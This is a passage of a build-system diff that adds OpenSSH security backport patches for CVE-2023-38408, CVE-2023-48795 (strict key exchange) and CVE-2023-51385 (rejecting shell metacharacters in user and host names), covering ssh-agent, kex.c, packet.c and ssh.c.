++ error("%s: parse: %s", __func__, ssh_err(r));
++ goto out;
++ }
++ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++ SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ /* check signature with hostkey on session ID */
++ if ((r = sshkey_verify(key, sshbuf_ptr(sig), sshbuf_len(sig),
++ sshbuf_ptr(sid), sshbuf_len(sid), NULL, 0, NULL)) != 0) {
++ error("%s: sshkey_verify for %s %s: %s", __func__, sshkey_type(key), fp, ssh_err(r));
++ goto out;
++ }
++ /* check whether sid/key already recorded */
++ for (i = 0; i < e->nsession_ids; i++) {
++ sid_match = buf_equal(sid, e->session_ids[i].sid) == 0;
++ key_match = sshkey_equal(key, e->session_ids[i].key);
++ if (sid_match && key_match) {
++ debug("%s: session ID already recorded for %s %s", __func__,
++ sshkey_type(key), fp);
++ r = 0;
++ goto out;
++ } else if (sid_match) {
++ error("%s: session ID recorded against different key "
++ "for %s %s", __func__, sshkey_type(key), fp);
++ r = -1;
++ goto out;
++ }
++ /*
++ * new sid with previously-seen key can happen, e.g. multiple
++ * connections to the same host.
++ */
++ }
++ /* record new key/sid */
++ if (e->nsession_ids >= AGENT_MAX_SESSION_IDS) {
++ error("%s: too many session IDs recorded", __func__);
++ goto out;
++ }
++ e->session_ids = xrecallocarray(e->session_ids, e->nsession_ids,
++ e->nsession_ids + 1, sizeof(*e->session_ids));
++ i = e->nsession_ids++;
++ debug("%s: recorded %s %s (slot %zu of %d)", __func__, sshkey_type(key), fp, i,
++ AGENT_MAX_SESSION_IDS);
++ e->session_ids[i].key = key;
++ e->session_ids[i].forwarded = fwd != 0;
++ key = NULL; /* transferred */
++ /* can't transfer sid; it's refcounted and scoped to request's life */
++ if ((e->session_ids[i].sid = sshbuf_new()) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++ if ((r = sshbuf_putb(e->session_ids[i].sid, sid)) != 0)
++ fatal("%s: sshbuf_putb session ID: %s", __func__, ssh_err(r));
++ /* success */
++ r = 0;
++ out:
++ sshkey_free(key);
++ sshbuf_free(sid);
++ sshbuf_free(sig);
++ return r == 0 ? 1 : 0;
++}
++
++static void
++process_extension(SocketEntry *e)
++{
++ int r, success = 0;
++ char *name;
++
++ debug2("%s: entering", __func__);
++ if ((r = sshbuf_get_cstring(e->request, &name, NULL)) != 0) {
++ error("%s: parse: %s", __func__, ssh_err(r));
++ goto send;
++ }
++ if (strcmp(name, "session-bind@openssh.com") == 0)
++ success = process_ext_session_bind(e);
++ else
++ debug("%s: unsupported extension \"%s\"", __func__, name);
++send:
++ send_status(e, success);
++}
+ /*
+ * dispatch incoming message.
+ * returns 1 on success, 0 for incomplete messages or -1 on error.
+@@ -1019,6 +1175,9 @@ process_message(u_int socknum)
+ process_remove_smartcard_key(e);
+ break;
+ #endif /* ENABLE_PKCS11 */
++ case SSH_AGENTC_EXTENSION:
++ process_extension(e);
++ break;
+ default:
+ /* Unknown message. Respond with failure. */
+ error("Unknown message %d", type);
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
new file mode 100644
index 0000000000..934775bdec
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
@@ -0,0 +1,120 @@
+From 4fe3d0fbd3d6dc1f19354e0d73a3231c461ed044 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:56:33 +0000
+Subject: [PATCH 12/12] upstream: Disallow remote addition of FIDO/PKCS11
+ provider libraries to ssh-agent by default.
+
+The old behaviour of allowing remote clients from loading providers
+can be restored using `ssh-agent -O allow-remote-pkcs11`.
+
+Detection of local/remote clients requires a ssh(1) that supports
+the `session-bind@openssh.com` extension. Forwarding access to a
+ssh-agent socket using non-OpenSSH tools may circumvent this control.
+
+ok markus@
+
+OpenBSD-Commit-ID: 4c2bdf79b214ae7e60cc8c39a45501344fa7bd7c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1f2731f5d7a8f8a8385c6031667ed29072c0d92a]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.1 | 20 ++++++++++++++++++++
+ ssh-agent.c | 26 ++++++++++++++++++++++++--
+ 2 files changed, 44 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.1 b/ssh-agent.1
+index fff0db6..a0f1e21 100644
+--- a/ssh-agent.1
++++ b/ssh-agent.1
+@@ -97,6 +97,26 @@ The default is
+ Kill the current agent (given by the
+ .Ev SSH_AGENT_PID
+ environment variable).
++Currently two options are supported:
++.Cm allow-remote-pkcs11
++and
++.Pp
++The
++.Cm allow-remote-pkcs11
++option allows clients of a forwarded
++.Nm
++to load PKCS#11 or FIDO provider libraries.
++By default only local clients may perform this operation.
++Note that signalling that a
++.Nm
++client remote is performed by
++.Xr ssh 1 ,
++and use of other tools to forward access to the agent socket may circumvent
++this restriction.
++.Pp
++The
++.Cm no-restrict-websafe ,
++instructs
+ .It Fl P Ar provider_whitelist
+ Specify a pattern-list of acceptable paths for PKCS#11 and FIDO authenticator
+ shared libraries that may be used with the
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 01c7f2b..40c1b6b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.300 2023/07/19 13:56:33 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -167,6 +167,12 @@ char socket_dir[PATH_MAX];
+ /* PKCS#11/Security key path whitelist */
+ static char *provider_whitelist;
+
++/*
++ * Allows PKCS11 providers or SK keys that use non-internal providers to
++ * be added over a remote connection (identified by session-bind@openssh.com).
++ */
++static int remote_add_provider;
++
+ /* locking */
+ #define LOCK_SIZE 32
+ #define LOCK_SALT_SIZE 16
+@@ -736,6 +742,15 @@ process_add_identity(SocketEntry *e)
+ if (strcasecmp(sk_provider, "internal") == 0) {
+ debug("%s: internal provider", __func__);
+ } else {
++ if (e->nsession_ids != 0 && !remote_add_provider) {
++ verbose("failed add of SK provider \"%.100s\": "
++ "remote addition of providers is disabled",
++ sk_provider);
++ free(sk_provider);
++ free(comment);
++ sshkey_free(k);
++ goto send;
++ }
+ if (realpath(sk_provider, canonical_provider) == NULL) {
+ verbose("failed provider \"%.100s\": "
+ "realpath: %s", sk_provider,
+@@ -901,6 +916,11 @@ process_add_smartcard_key(SocketEntry *e)
+ goto send;
+ }
+ }
++ if (e->nsession_ids != 0 && !remote_add_provider) {
++ verbose("failed PKCS#11 add of \"%.100s\": remote addition of "
++ "providers is disabled", provider);
++ goto send;
++ }
+ if (realpath(provider, canonical_provider) == NULL) {
+ verbose("failed PKCS#11 add of \"%.100s\": realpath: %s",
+ provider, strerror(errno));
+@@ -1556,7 +1576,9 @@ main(int ac, char **av)
+ break;
+ case 'O':
+ if (strcmp(optarg, "no-restrict-websafe") == 0)
+- restrict_websafe = 0;
++ restrict_websafe = 0;
++ else if (strcmp(optarg, "allow-remote-pkcs11") == 0)
++ remote_add_provider = 1;
+ else
+ fatal("Unknown -O option");
+ break;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
new file mode 100644
index 0000000000..57c45e3d93
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
@@ -0,0 +1,468 @@
+(modified to not remove ssh_packet_read_expect(), to add to
+KexAlgorithms in sshd.c and sshconnect2.c as this version pre-dates
+kex_proposal_populate_entries(), replace debug*_f() with debug*(),
+error*_f() with error*(), and fatal_f() with fatal())
+
+Backport of:
+
+From 1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:45:17 +0000
+Subject: [PATCH] upstream: implement "strict key exchange" in ssh and sshd
+
+This adds a protocol extension to improve the integrity of the SSH
+transport protocol, particular in and around the initial key exchange
+(KEX) phase.
+
+Full details of the extension are in the PROTOCOL file.
+
+with markus@
+
+OpenBSD-Commit-ID: 2a66ac962f0a630d7945fee54004ed9e9c439f14
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/openssh/tree/debian/patches/CVE-2023-48795.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/openssh/openssh-portable/commit/1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5]
+CVE: CVE-2023-48795
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ PROTOCOL | 26 +++++++++++++++++
+ kex.c | 68 +++++++++++++++++++++++++++++++++-----------
+ kex.h | 1 +
+ packet.c | 78 ++++++++++++++++++++++++++++++++++++++-------------
+ sshconnect2.c | 14 +++------
+ sshd.c | 7 +++--
+ 6 files changed, 146 insertions(+), 48 deletions(-)
+
+diff --git a/PROTOCOL b/PROTOCOL
+index f75c1c0..89bddfe 100644
+--- a/PROTOCOL
++++ b/PROTOCOL
+@@ -102,6 +102,32 @@ OpenSSH supports the use of ECDH in Curve25519 for key exchange as
+ described at:
+ http://git.libssh.org/users/aris/libssh.git/plain/doc/curve25519-sha256@libssh.org.txt?h=curve25519
+
++1.9 transport: strict key exchange extension
++
++OpenSSH supports a number of transport-layer hardening measures under
++a "strict KEX" feature. This feature is signalled similarly to the
++RFC8308 ext-info feature: by including a additional algorithm in the
++initiial SSH2_MSG_KEXINIT kex_algorithms field. The client may append
++"kex-strict-c-v00@openssh.com" to its kex_algorithms and the server
++may append "kex-strict-s-v00@openssh.com". These pseudo-algorithms
++are only valid in the initial SSH2_MSG_KEXINIT and MUST be ignored
++if they are present in subsequent SSH2_MSG_KEXINIT packets.
++
++When an endpoint that supports this extension observes this algorithm
++name in a peer's KEXINIT packet, it MUST make the following changes to
++the the protocol:
++
++a) During initial KEX, terminate the connection if any unexpected or
++ out-of-sequence packet is received. This includes terminating the
++ connection if the first packet received is not SSH2_MSG_KEXINIT.
++ Unexpected packets for the purpose of strict KEX include messages
++ that are otherwise valid at any time during the connection such as
++ SSH2_MSG_DEBUG and SSH2_MSG_IGNORE.
++b) After sending or receiving a SSH2_MSG_NEWKEYS message, reset the
++ packet sequence number to zero. This behaviour persists for the
++ duration of the connection (i.e. not just the first
++ SSH2_MSG_NEWKEYS).
++
+ 2. Connection protocol changes
+
+ 2.1. connection: Channel write close extension "eow@openssh.com"
+diff --git a/kex.c b/kex.c
+index ce85f04..3129a4e 100644
+--- a/kex.c
++++ b/kex.c
+@@ -63,7 +63,7 @@
+ #include "digest.h"
+
+ /* prototype */
+-static int kex_choose_conf(struct ssh *);
++static int kex_choose_conf(struct ssh *, uint32_t seq);
+ static int kex_input_newkeys(int, u_int32_t, struct ssh *);
+
+ static const char *proposal_names[PROPOSAL_MAX] = {
+@@ -173,6 +173,18 @@ kex_names_valid(const char *names)
+ return 1;
+ }
+
++/* returns non-zero if proposal contains any algorithm from algs */
++static int
++has_any_alg(const char *proposal, const char *algs)
++{
++ char *cp;
++
++ if ((cp = match_list(proposal, algs, NULL)) == NULL)
++ return 0;
++ free(cp);
++ return 1;
++}
++
+ /*
+ * Concatenate algorithm names, avoiding duplicates in the process.
+ * Caller must free returned string.
+@@ -180,7 +192,7 @@ kex_names_valid(const char *names)
+ char *
+ kex_names_cat(const char *a, const char *b)
+ {
+- char *ret = NULL, *tmp = NULL, *cp, *p, *m;
++ char *ret = NULL, *tmp = NULL, *cp, *p;
+ size_t len;
+
+ if (a == NULL || *a == '\0')
+@@ -197,10 +209,8 @@ kex_names_cat(const char *a, const char *b)
+ }
+ strlcpy(ret, a, len);
+ for ((p = strsep(&cp, ",")); p && *p != '\0'; (p = strsep(&cp, ","))) {
+- if ((m = match_list(ret, p, NULL)) != NULL) {
+- free(m);
++ if (has_any_alg(ret, p))
+ continue; /* Algorithm already present */
+- }
+ if (strlcat(ret, ",", len) >= len ||
+ strlcat(ret, p, len) >= len) {
+ free(tmp);
+@@ -409,7 +419,12 @@ kex_protocol_error(int type, u_int32_t seq, struct ssh *ssh)
+ {
+ int r;
+
+- error("kex protocol error: type %d seq %u", type, seq);
++ /* If in strict mode, any unexpected message is an error */
++ if ((ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict) {
++ ssh_packet_disconnect(ssh, "strict KEX violation: "
++ "unexpected packet type %u (seqnr %u)", type, seq);
++ }
++ error("type %u seq %u", type, seq);
+ if ((r = sshpkt_start(ssh, SSH2_MSG_UNIMPLEMENTED)) != 0 ||
+ (r = sshpkt_put_u32(ssh, seq)) != 0 ||
+ (r = sshpkt_send(ssh)) != 0)
+@@ -481,6 +496,11 @@ kex_input_ext_info(int type, u_int32_t seq, struct ssh *ssh)
+ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &kex_protocol_error);
+ if ((r = sshpkt_get_u32(ssh, &ninfo)) != 0)
+ return r;
++ if (ninfo >= 1024) {
++ error("SSH2_MSG_EXT_INFO with too many entries, expected "
++ "<=1024, received %u", ninfo);
++ return dispatch_protocol_error(type, seq, ssh);
++ }
+ for (i = 0; i < ninfo; i++) {
+ if ((r = sshpkt_get_cstring(ssh, &name, NULL)) != 0)
+ return r;
+@@ -581,7 +601,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ error("%s: no hex", __func__);
+ return SSH_ERR_INTERNAL_ERROR;
+ }
+- ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, NULL);
++ ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, &kex_protocol_error);
+ ptr = sshpkt_ptr(ssh, &dlen);
+ if ((r = sshbuf_put(kex->peer, ptr, dlen)) != 0)
+ return r;
+@@ -617,7 +637,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ if (!(kex->flags & KEX_INIT_SENT))
+ if ((r = kex_send_kexinit(ssh)) != 0)
+ return r;
+- if ((r = kex_choose_conf(ssh)) != 0)
++ if ((r = kex_choose_conf(ssh, seq)) != 0)
+ return r;
+
+ if (kex->kex_type < KEX_MAX && kex->kex[kex->kex_type] != NULL)
+@@ -880,7 +900,13 @@ proposals_match(char *my[PROPOSAL_MAX], char *peer[PROPOSAL_MAX])
+ }
+
+ static int
+-kex_choose_conf(struct ssh *ssh)
++kexalgs_contains(char **peer, const char *ext)
++{
++ return has_any_alg(peer[PROPOSAL_KEX_ALGS], ext);
++}
++
++static int
++kex_choose_conf(struct ssh *ssh, uint32_t seq)
+ {
+ struct kex *kex = ssh->kex;
+ struct newkeys *newkeys;
+@@ -905,13 +931,23 @@ kex_choose_conf(struct ssh *ssh)
+ sprop=peer;
+ }
+
+- /* Check whether client supports ext_info_c */
+- if (kex->server && (kex->flags & KEX_INITIAL)) {
+- char *ext;
+-
+- ext = match_list("ext-info-c", peer[PROPOSAL_KEX_ALGS], NULL);
+- kex->ext_info_c = (ext != NULL);
+- free(ext);
++ /* Check whether peer supports ext_info/kex_strict */
++ if ((kex->flags & KEX_INITIAL) != 0) {
++ if (kex->server) {
++ kex->ext_info_c = kexalgs_contains(peer, "ext-info-c");
++ kex->kex_strict = kexalgs_contains(peer,
++ "kex-strict-c-v00@openssh.com");
++ } else {
++ kex->kex_strict = kexalgs_contains(peer,
++ "kex-strict-s-v00@openssh.com");
++ }
++ if (kex->kex_strict) {
++ debug3("will use strict KEX ordering");
++ if (seq != 0)
++ ssh_packet_disconnect(ssh,
++ "strict KEX violation: "
++ "KEXINIT was not the first packet");
++ }
+ }
+
+ /* Algorithm Negotiation */
+diff --git a/kex.h b/kex.h
+index a5ae6ac..cae38f7 100644
+--- a/kex.h
++++ b/kex.h
+@@ -145,6 +145,7 @@ struct kex {
+ u_int kex_type;
+ char *server_sig_algs;
+ int ext_info_c;
++ int kex_strict;
+ struct sshbuf *my;
+ struct sshbuf *peer;
+ struct sshbuf *client_version;
+diff --git a/packet.c b/packet.c
+index 6d3e917..43139f9 100644
+--- a/packet.c
++++ b/packet.c
+@@ -1203,8 +1203,13 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ sshbuf_dump(state->output, stderr);
+ #endif
+ /* increment sequence number for outgoing packets */
+- if (++state->p_send.seqnr == 0)
++ if (++state->p_send.seqnr == 0) {
++ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++ ssh_packet_disconnect(ssh, "outgoing sequence number "
++ "wrapped during initial key exchange");
++ }
+ logit("outgoing seqnr wraps around");
++ }
+ if (++state->p_send.packets == 0)
+ if (!(ssh->compat & SSH_BUG_NOREKEY))
+ return SSH_ERR_NEED_REKEY;
+@@ -1212,6 +1217,11 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ state->p_send.bytes += len;
+ sshbuf_reset(state->outgoing_packet);
+
++ if (type == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++ debug("resetting send seqnr %u", state->p_send.seqnr);
++ state->p_send.seqnr = 0;
++ }
++
+ if (type == SSH2_MSG_NEWKEYS)
+ r = ssh_set_newkeys(ssh, MODE_OUT);
+ else if (type == SSH2_MSG_USERAUTH_SUCCESS && state->server_side)
+@@ -1345,8 +1355,7 @@ ssh_packet_read_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ /* Stay in the loop until we have received a complete packet. */
+ for (;;) {
+ /* Try to read a packet from the buffer. */
+- r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p);
+- if (r != 0)
++ if ((r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p)) != 0)
+ break;
+ /* If we got a packet, return it. */
+ if (*typep != SSH_MSG_NONE)
+@@ -1633,10 +1642,16 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ if ((r = sshbuf_consume(state->input, mac->mac_len)) != 0)
+ goto out;
+ }
++
+ if (seqnr_p != NULL)
+ *seqnr_p = state->p_read.seqnr;
+- if (++state->p_read.seqnr == 0)
++ if (++state->p_read.seqnr == 0) {
++ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++ ssh_packet_disconnect(ssh, "incoming sequence number "
++ "wrapped during initial key exchange");
++ }
+ logit("incoming seqnr wraps around");
++ }
+ if (++state->p_read.packets == 0)
+ if (!(ssh->compat & SSH_BUG_NOREKEY))
+ return SSH_ERR_NEED_REKEY;
+@@ -1702,6 +1717,10 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ #endif
+ /* reset for next packet */
+ state->packlen = 0;
++ if (*typep == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++ debug("resetting read seqnr %u", state->p_read.seqnr);
++ state->p_read.seqnr = 0;
++ }
+
+ /* do we need to rekey? */
+ if (ssh_packet_need_rekeying(ssh, 0)) {
+@@ -1726,10 +1745,39 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ r = ssh_packet_read_poll2(ssh, typep, seqnr_p);
+ if (r != 0)
+ return r;
+- if (*typep) {
+- state->keep_alive_timeouts = 0;
+- DBG(debug("received packet type %d", *typep));
++ if (*typep == 0) {
++ /* no message ready */
++ return 0;
++ }
++ state->keep_alive_timeouts = 0;
++ DBG(debug("received packet type %d", *typep));
++
++ /* Always process disconnect messages */
++ if (*typep == SSH2_MSG_DISCONNECT) {
++ if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
++ (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
++ return r;
++ /* Ignore normal client exit notifications */
++ do_log2(ssh->state->server_side &&
++ reason == SSH2_DISCONNECT_BY_APPLICATION ?
++ SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
++ "Received disconnect from %s port %d:"
++ "%u: %.400s", ssh_remote_ipaddr(ssh),
++ ssh_remote_port(ssh), reason, msg);
++ free(msg);
++ return SSH_ERR_DISCONNECTED;
+ }
++
++ /*
++ * Do not implicitly handle any messages here during initial
++ * KEX when in strict mode. They will be need to be allowed
++ * explicitly by the KEX dispatch table or they will generate
++ * protocol errors.
++ */
++ if (ssh->kex != NULL &&
++ (ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict)
++ return 0;
++ /* Implicitly handle transport-level messages */
+ switch (*typep) {
+ case SSH2_MSG_IGNORE:
+ debug3("Received SSH2_MSG_IGNORE");
+@@ -1744,19 +1792,6 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ debug("Remote: %.900s", msg);
+ free(msg);
+ break;
+- case SSH2_MSG_DISCONNECT:
+- if ((r = sshpkt_get_u32(ssh, &reason)) != 0 ||
+- (r = sshpkt_get_string(ssh, &msg, NULL)) != 0)
+- return r;
+- /* Ignore normal client exit notifications */
+- do_log2(ssh->state->server_side &&
+- reason == SSH2_DISCONNECT_BY_APPLICATION ?
+- SYSLOG_LEVEL_INFO : SYSLOG_LEVEL_ERROR,
+- "Received disconnect from %s port %d:"
+- "%u: %.400s", ssh_remote_ipaddr(ssh),
+- ssh_remote_port(ssh), reason, msg);
+- free(msg);
+- return SSH_ERR_DISCONNECTED;
+ case SSH2_MSG_UNIMPLEMENTED:
+ if ((r = sshpkt_get_u32(ssh, &seqnr)) != 0)
+ return r;
+@@ -2235,6 +2270,7 @@ kex_to_blob(struct sshbuf *m, struct kex *kex)
+ (r = sshbuf_put_u32(m, kex->hostkey_type)) != 0 ||
+ (r = sshbuf_put_u32(m, kex->hostkey_nid)) != 0 ||
+ (r = sshbuf_put_u32(m, kex->kex_type)) != 0 ||
++ (r = sshbuf_put_u32(m, kex->kex_strict)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->my)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->peer)) != 0 ||
+ (r = sshbuf_put_stringb(m, kex->client_version)) != 0 ||
+@@ -2397,6 +2433,7 @@ kex_from_blob(struct sshbuf *m, struct kex **kexp)
+ (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_type)) != 0 ||
+ (r = sshbuf_get_u32(m, (u_int *)&kex->hostkey_nid)) != 0 ||
+ (r = sshbuf_get_u32(m, &kex->kex_type)) != 0 ||
++ (r = sshbuf_get_u32(m, &kex->kex_strict)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->my)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->peer)) != 0 ||
+ (r = sshbuf_get_stringb(m, kex->client_version)) != 0 ||
+@@ -2724,6 +2761,7 @@ sshpkt_disconnect(struct ssh *ssh, const char *fmt,...)
+ vsnprintf(buf, sizeof(buf), fmt, args);
+ va_end(args);
+
++ debug2("sending SSH2_MSG_DISCONNECT: %s", buf);
+ if ((r = sshpkt_start(ssh, SSH2_MSG_DISCONNECT)) != 0 ||
+ (r = sshpkt_put_u32(ssh, SSH2_DISCONNECT_PROTOCOL_ERROR)) != 0 ||
+ (r = sshpkt_put_cstring(ssh, buf)) != 0 ||
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 5df9477..617ed9f 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -218,7 +218,8 @@ ssh_kex2(struct ssh *ssh, char *host, struct sockaddr *hostaddr, u_short port)
+ fatal("%s: kex_assemble_namelist", __func__);
+ free(all_key);
+
+- if ((s = kex_names_cat(options.kex_algorithms, "ext-info-c")) == NULL)
++ if ((s = kex_names_cat(options.kex_algorithms,
++ "ext-info-c,kex-strict-c-v00@openssh.com")) == NULL)
+ fatal("%s: kex_names_cat", __func__);
+ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ myproposal[PROPOSAL_ENC_ALGS_CTOS] =
+@@ -343,7 +344,6 @@ struct cauthmethod {
+ };
+
+ static int input_userauth_service_accept(int, u_int32_t, struct ssh *);
+-static int input_userauth_ext_info(int, u_int32_t, struct ssh *);
+ static int input_userauth_success(int, u_int32_t, struct ssh *);
+ static int input_userauth_failure(int, u_int32_t, struct ssh *);
+ static int input_userauth_banner(int, u_int32_t, struct ssh *);
+@@ -460,7 +460,7 @@ ssh_userauth2(struct ssh *ssh, const char *local_user,
+
+ ssh->authctxt = &authctxt;
+ ssh_dispatch_init(ssh, &input_userauth_error);
+- ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &input_userauth_ext_info);
++ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, kex_input_ext_info);
+ ssh_dispatch_set(ssh, SSH2_MSG_SERVICE_ACCEPT, &input_userauth_service_accept);
+ ssh_dispatch_run_fatal(ssh, DISPATCH_BLOCK, &authctxt.success); /* loop until success */
+ pubkey_cleanup(ssh);
+@@ -505,13 +505,6 @@ input_userauth_service_accept(int type, u_int32_t seq, struct ssh *ssh)
+ return r;
+ }
+
+-/* ARGSUSED */
+-static int
+-input_userauth_ext_info(int type, u_int32_t seqnr, struct ssh *ssh)
+-{
+- return kex_input_ext_info(type, seqnr, ssh);
+-}
+-
+ void
+ userauth(struct ssh *ssh, char *authlist)
+ {
+@@ -593,6 +586,7 @@ input_userauth_success(int type, u_int32_t seq, struct ssh *ssh)
+ free(authctxt->methoddata);
+ authctxt->methoddata = NULL;
+ authctxt->success = 1; /* break out */
++ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, dispatch_protocol_error);
+ return 0;
+ }
+
+diff --git a/sshd.c b/sshd.c
+index 60b2aaf..ffea38c 100644
+--- a/sshd.c
++++ b/sshd.c
+@@ -2323,11 +2323,13 @@ static void
+ do_ssh2_kex(struct ssh *ssh)
+ {
+ char *myproposal[PROPOSAL_MAX] = { KEX_SERVER };
++ char *s;
+ struct kex *kex;
+ int r;
+
+- myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(
+- options.kex_algorithms);
++ if ((s = kex_names_cat(options.kex_algorithms, "kex-strict-s-v00@openssh.com")) == NULL)
++ fatal("kex_names_cat");
++ myproposal[PROPOSAL_KEX_ALGS] = compat_kex_proposal(s);
+ myproposal[PROPOSAL_ENC_ALGS_CTOS] = compat_cipher_proposal(
+ options.ciphers);
+ myproposal[PROPOSAL_ENC_ALGS_STOC] = compat_cipher_proposal(
+@@ -2382,6 +2384,7 @@ do_ssh2_kex(struct ssh *ssh)
+ packet_send();
+ packet_write_wait();
+ #endif
++ free(s);
+ debug("KEX done");
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
new file mode 100644
index 0000000000..0ba8c312d0
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-51385.patch
@@ -0,0 +1,95 @@
+From 7ef3787c84b6b524501211b11a26c742f829af1a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:47:44 +0000
+Subject: [PATCH] upstream: ban user/hostnames with most shell metacharacters
+
+This makes ssh(1) refuse user or host names provided on the
+commandline that contain most shell metacharacters.
+
+Some programs that invoke ssh(1) using untrusted data do not filter
+metacharacters in arguments they supply. This could create
+interactions with user-specified ProxyCommand and other directives
+that allow shell injection attacks to occur.
+
+It's a mistake to invoke ssh(1) with arbitrary untrusted arguments,
+but getting this stuff right can be tricky, so this should prevent
+most obvious ways of creating risky situations. It however is not
+and cannot be perfect: ssh(1) has no practical way of interpreting
+what shell quoting rules are in use and how they interact with the
+user's specified ProxyCommand.
+
+To allow configurations that use strange user or hostnames to
+continue to work, this strictness is applied only to names coming
+from the commandline. Names specified using User or Hostname
+directives in ssh_config(5) are not affected.
+
+feedback/ok millert@ markus@ dtucker@ deraadt@
+
+OpenBSD-Commit-ID: 3b487348b5964f3e77b6b4d3da4c3b439e94b2d9
+
+CVE: CVE-2023-51385
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/7ef3787c84b6b524501211b11a26c742f829af1a]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Hunks refreshed to apply cleanly
+
+---
+ ssh.c | 41 ++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 40 insertions(+), 1 deletion(-)
+
+diff --git a/ssh.c b/ssh.c
+index 35c48e62d18..48d93ddf2a9 100644
+--- a/ssh.c
++++ b/ssh.c
+@@ -583,6 +583,41 @@ set_addrinfo_port(struct addrinfo *addrs
+ }
+ }
+
++static int
++valid_hostname(const char *s)
++{
++ size_t i;
++
++ if (*s == '-')
++ return 0;
++ for (i = 0; s[i] != 0; i++) {
++ if (strchr("'`\"$\\;&<>|(){}", s[i]) != NULL ||
++ isspace((u_char)s[i]) || iscntrl((u_char)s[i]))
++ return 0;
++ }
++ return 1;
++}
++
++static int
++valid_ruser(const char *s)
++{
++ size_t i;
++
++ if (*s == '-')
++ return 0;
++ for (i = 0; s[i] != 0; i++) {
++ if (strchr("'`\";&<>|(){}", s[i]) != NULL)
++ return 0;
++ /* Disallow '-' after whitespace */
++ if (isspace((u_char)s[i]) && s[i + 1] == '-')
++ return 0;
++ /* Disallow \ in last position */
++ if (s[i] == '\\' && s[i + 1] == '\0')
++ return 0;
++ }
++ return 1;
++}
++
+ /*
+ * Main program for the ssh client.
+ */
+@@ -1069,6 +1104,10 @@ main(int ac, char **av)
+ if (!host)
+ usage();
+
++ if (!valid_hostname(host))
++ fatal("hostname contains invalid characters");
